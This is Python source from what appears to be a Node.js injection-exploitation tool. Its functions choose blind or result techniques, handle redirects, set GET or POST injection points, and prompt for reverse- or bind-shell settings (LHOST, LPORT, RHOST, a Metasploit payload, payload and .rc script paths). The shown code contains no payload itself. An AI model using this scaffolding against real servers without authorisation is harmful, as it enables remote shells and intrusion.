def change_technique(prompt_message, options_message, alter_tech_msg, current_tech_msg):
    """Ask the user whether to switch between the 'result' and 'blind' techniques.

    ``options_message`` is appended to ``prompt_message`` only when
    ``settings.print_info`` equals 1. The first element of the ``prompt.yesOrNo``
    answer is echoed to stdout, the second is the decision code:

      * 1 -> ``settings.technique`` is toggled ('result' <-> 'blind'); returns True
      * 0 -> technique left unchanged; returns False
      * anything else -> the prompt is repeated once with the two confirmation
        texts swapped and that raw ``prompt.yesOrNo`` result (a tuple, not a
        bool) is returned as-is

    Exceptions are printed and handed to ``verbosity.error_info``; the function
    then falls off the end and returns None.
    """
    try:
        if settings.print_info == 1:
            prompt_message += options_message
        reply = prompt.yesOrNo(prompt_message, alter_tech_msg, current_tech_msg)
        print(reply[0])
        decision = reply[1]
        if decision == 1:
            # Toggle between the two supported techniques.
            settings.technique = 'blind' if settings.technique == 'result' else 'result'
            return True
        if decision == 0:
            return False
        # Unrecognised decision code: ask again with the confirmation texts swapped.
        return prompt.yesOrNo(prompt_message, current_tech_msg, alter_tech_msg)
    except Exception as e:
        print(Fore.RED + "[!] ERROR: %s" % e)
        verbosity.error_info(e)
def check_redirection(res, tech):
    """Compare the response URL with ``settings.url`` and ask whether to follow a redirect.

    Parameters:
        res: response object; only ``res.url`` is read.
        tech: technique name; when it is 'blind' the progress messages are
            suppressed so they are not repeated on every request.

    Returns ``settings.follow_redirection``: 1 when ``res.url`` differs from
    ``settings.url``, 0 otherwise. When a redirect is seen the user is prompted;
    only on a 'yes' answer are ``settings.url`` and ``settings.pre_url`` moved to
    ``res.url`` -- that prompt is the sole guard against the tool silently
    retargeting to a different origin, so it is never auto-accepted here.
    NOTE(review): the flag is set to 1 before the answer is inspected, so it is
    1 even when the user declines; confirm whether callers read it as
    "redirect seen" or "redirect followed" before relying on it.
    On any exception the error is reported, logged and the process exits.
    """
    try:
        quiet = (tech == 'blind')
        if not quiet:
            verbosity.print_message(Fore.YELLOW + '\n[<] Checking for redirection', settings.print_info)

        if res.url != settings.url:
            warning = (Fore.RED + Style.BRIGHT + '[!] WARNING: REDIRECTION FOUND!\n'
                       + Style.NORMAL + Fore.WHITE + " from: " + Fore.GREEN + Style.BRIGHT + settings.url + "\n"
                       + Style.NORMAL + Fore.WHITE + " to: " + Fore.RED + Style.BRIGHT + res.url)
            print(warning)

            question = Fore.WHITE + Style.BRIGHT + "[?] Do you want to follow redirection?\n"
            if settings.print_info == 1:
                question += Style.DIM + Fore.WHITE + "[-] Enter 'y' for 'yes' or 'n' for 'no'.\n"
            decline_msg = Fore.RED + '[-] Not follow redirection.'
            accept_msg = Fore.WHITE + Style.NORMAL + '[-] Follow redirection.'
            reply = prompt.yesOrNo(question, accept_msg, decline_msg)
            verbosity.print_message(reply[0], settings.print_info)

            settings.follow_redirection = 1
            if reply[1] == 1:
                # User accepted: retarget to the redirected URL.
                settings.url = res.url
                settings.pre_url = settings.url
                if settings.technique != 'blind':
                    verbosity.print_message(Style.NORMAL + Fore.YELLOW + '[>]', settings.print_info)
        else:
            if not quiet:
                verbosity.print_message(Style.DIM + Fore.WHITE + '[-] No redirection made.', settings.print_info)
            settings.follow_redirection = 0

        return settings.follow_redirection
    except Exception as e:
        print(Fore.RED + "[!] ERROR: %s" % e)
        verbosity.error_info(e)
        sys.exit()
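def checkPathExistenceInHomeDirectory(flag,path):
    """Resolve *path* under ``settings.home_directory`` and let the user confirm it.

    Parameters:
        flag: name of the option being set; only used in the printed messages.
        path: path fragment appended to ``settings.home_directory`` with a '/'.

    Returns the joined path string when it exists on disk and the user answers
    'yes'; otherwise the string sentinel 'None' (the same sentinel the rest of
    the tool compares against, e.g. ``settings.lhost == 'None'``). The error
    path also returns 'None' so callers never receive a bare None object that
    would fail such a comparison.
    """
    try:
        print(Fore.YELLOW + "[i] Checking if path exist in home directory ...")
        # Plain '/' join on purpose: os.path.join would discard the home
        # directory entirely if *path* happened to be absolute.
        path = "%s/%s" %(settings.home_directory,path)
        if not os.path.exists(path):
            print(Fore.RED + "[!] ERROR: '%s' is not a valid path for '%s'" %(path,flag))
            return 'None'
        home_directory_select = prompt.yesOrNo(
            ("[?] Did you mean '%s' ?\n" % path) + Fore.YELLOW + "[i] Enter 'y' for 'yes' or 'n' for 'no'.\n" + Fore.WHITE + " - ",
            Fore.GREEN + "[!] Setting path: '%s' = '%s'" %(flag,path),
            Fore.RED + "[!] Not setting path '%s' for '%s'" %(path,flag))
        # Only an explicit 'yes' (code 1) adopts the resolved path.
        if home_directory_select[1] == 1:
            return path
        return 'None'
    except Exception as e:
        print(Fore.RED + "[!] ERROR: %s" %e)
        verbosity.error_info(e)
        return 'None'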
def request_method():
    """Choose POST or GET mode from ``settings.pdata`` and fill the request settings.

    POST mode (``settings.pdata`` is not the 'None' sentinel): when the URL also
    carries a query string the user is asked whether to strip it (the stripped
    URL is rebuilt by ``concat_url``). Afterwards ``pre_url`` mirrors ``url``,
    ``initial_inject_here`` / ``inject_here`` / ``initial_parameter`` mirror
    ``pdata`` and ``request_method`` is set to 1.

    GET mode: the URL is split on '?'; ``pre_url`` receives the part before it,
    the two inject_here fields the part after it, ``initial_parameter`` and
    ``pdata`` the whole URL, and ``request_method`` is set to 0. A GET URL with
    no '?' raises IndexError, which the handler below reports and logs.

    Returns None.
    """
    try:
        if settings.pdata != 'None':
            # ---- POST, possibly combined with query parameters in the URL ----
            verbosity.print_message(Fore.GREEN + Style.BRIGHT + '[i] POST data found!', settings.print_info)
            if "?" in settings.url:
                question = Fore.WHITE + Style.BRIGHT + "[?] Query parameter(s) found on POST request. Do you want to remove query request(s) from URL?\n"
                if settings.print_info == 1:
                    question += Style.DIM + Fore.WHITE + "[-] Enter 'y' for 'yes' or 'n' for 'no'.\n"
                reply = prompt.yesOrNo(
                    question,
                    Style.DIM + Fore.WHITE + "[-] Removing query parameters.",
                    Style.DIM + Fore.WHITE + "[-] Continue with query parameters.")
                if reply[1] == 1:
                    pieces = settings.url.split("?")
                    settings.url = concat_url(len(pieces) - 1, pieces)
                print(reply[0])
            banner = '[-] Will execute POST REQUESTS on "%s" with POST DATA "%s"' % (settings.url, settings.pdata)
            verbosity.print_message(Fore.WHITE + Style.DIM + banner, settings.print_info)
            # In POST mode the URL is used unchanged and the body is the injection point.
            settings.pre_url = settings.url
            settings.initial_inject_here = settings.pdata
            settings.inject_here = settings.pdata
            settings.initial_parameter = settings.pdata
            settings.request_method = 1
        else:
            # ---- GET: the query string is the injection point ----
            print(Fore.GREEN + Style.BRIGHT + '[i] GET parameter found!')
            verbosity.print_message(Style.DIM + Fore.WHITE + '[-] Will execute GET REQUESTS on "' + settings.url + '".', settings.print_info)
            pieces = settings.url.split("?")
            base_url = pieces[0]
            query_part = pieces[1]
            settings.pre_url = base_url
            settings.initial_inject_here = query_part
            settings.inject_here = query_part
            settings.initial_parameter = settings.url
            settings.pdata = settings.initial_parameter
            settings.request_method = 0
    except Exception as e:
        print(Fore.RED + "[!] ERROR: %s" % e)
        verbosity.error_info(e)
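def initialize_payload_options(start):
    """Fill in every payload setting that is still undefined, prompting the user where needed.

    Parameters:
        start: when truthy, ``start_exploitation()`` is called once all
            values have been set.

    Steps, in order:
      * LHOST: prompted for when it is the 'None' sentinel and the selected
        ``settings.msf_payload`` is not the bind payload.
      * RHOST (bind payload only): derived from ``settings.pre_url`` -- the text
        before the last ':' becomes ``prefix_rhost`` and its third '/'-separated
        piece becomes ``rhost`` (assumes a 'scheme://host[:port]...' shape; any
        other shape raises IndexError and lands in the handler below).
      * LPORT: prompted for when 'None', otherwise passed through
        ``payload_init.checkLPORT``.
      * payload_path / rc_path: prompted for when 0. In every branch the file
        name is appended ('nodejs_payload.js' for the payload, 'nodejs_shell.rc'
        for the rc script) and runs of '/' are collapsed.
      * encoding: prompted for while ``settings.encoding[0]`` is 'None'.

    Exceptions are printed once and passed to ``verbosity.error_info``.
    Returns None.
    """
    try:
        verbosity.print_message(Fore.YELLOW + '[<] Initialize exploitation variables.', settings.print_info)

        # Reverse-shell payloads need a local host to connect back to.
        if settings.lhost == 'None' and settings.msf_payload != settings.msf_payload_bind:
            verbosity.print_message(Fore.RED + '[!] LHOST not defined!', settings.print_info)
            settings.lhost = str(payload_init.get_input("[?] Please, set your local host ip.\n - ", "LHOST"))

        # Bind-shell payloads: the remote host is taken from the target URL.
        if settings.msf_payload == settings.msf_payload_bind:
            rhost = settings.pre_url.rsplit(":", 1)
            settings.prefix_rhost = rhost[0]
            # 'scheme://host' split on '/' gives ['scheme:', '', 'host', ...]
            settings.rhost = rhost[0].split("/")[2]
            verbosity.print_message(Fore.GREEN + "[!] Setting automatically remote host: 'RHOST' = " + settings.rhost, settings.print_info)

        if settings.lport == 'None':
            verbosity.print_message(Fore.RED + '[!] LPORT not defined!', settings.print_info)
            settings.lport = str(payload_init.get_input("[?] Please, set your local port.\n - ", "LPORT"))
        else:
            settings.lport = payload_init.checkLPORT(settings.lport)

        if settings.payload_path == 0:
            verbosity.print_message(Fore.RED + '[!] PAYLOAD PATH not defined!', settings.print_info)
            payload_path = payload_init.get_input("[?] Please, set the PAYLOAD PATH.\n - ", "PAYLOAD PATH")
            settings.payload_path = re.sub(r"\/+", "/", '%s/nodejs_payload.js' % payload_path)
            print(settings.payload_path)
        else:
            settings.payload_path = re.sub(r"\/+", "/", '%s/nodejs_payload.js' % settings.payload_path)

        if settings.rc_path == 0:
            verbosity.print_message(Fore.RED + '[!] .RC SCRIPT PATH not defined!', settings.print_info)
            rc_path = payload_init.get_input("[?] Please, set the .RC SCRIPT PATH.\n - ", "RC SCRIPT PATH")
            # The rc script name must be the same in both branches; the prompted
            # branch must not fall back to the .js payload name.
            settings.rc_path = re.sub(r"\/+", "/", '%s/nodejs_shell.rc' % rc_path)
            print(settings.rc_path)
        else:
            settings.rc_path = re.sub(r"\/+", "/", '%s/nodejs_shell.rc' % settings.rc_path)

        if settings.encoding[0] == 'None':
            verbosity.print_message(Fore.RED + '[!] ENCODING not defined!', settings.print_info)
            # Keep asking until prompt.yesOrNo yields something other than the sentinel.
            while settings.encoding[0] == 'None':
                settings.encoding = prompt.yesOrNo(
                    "[?] Please, type a valid value for payload encoding.\n" + Fore.YELLOW + "[i] Enter 'y' for 'yes' or 'n' for 'no'.\n" + Fore.WHITE + " - ",
                    Fore.GREEN + "[i] Payload will be encoded..",
                    Fore.GREEN + "[i] Payload will be unecoded")

        verbosity.print_message(Fore.GREEN + '[!] Exploitation variables successfully defined!\n' + Fore.YELLOW + '[>]', settings.print_info)
        if start:
            start_exploitation()
    except Exception as e:
        # Report once; the bare print(e) that preceded this duplicated the message.
        print(Fore.RED + "[!] ERROR: %s" % e)
        verbosity.error_info(e)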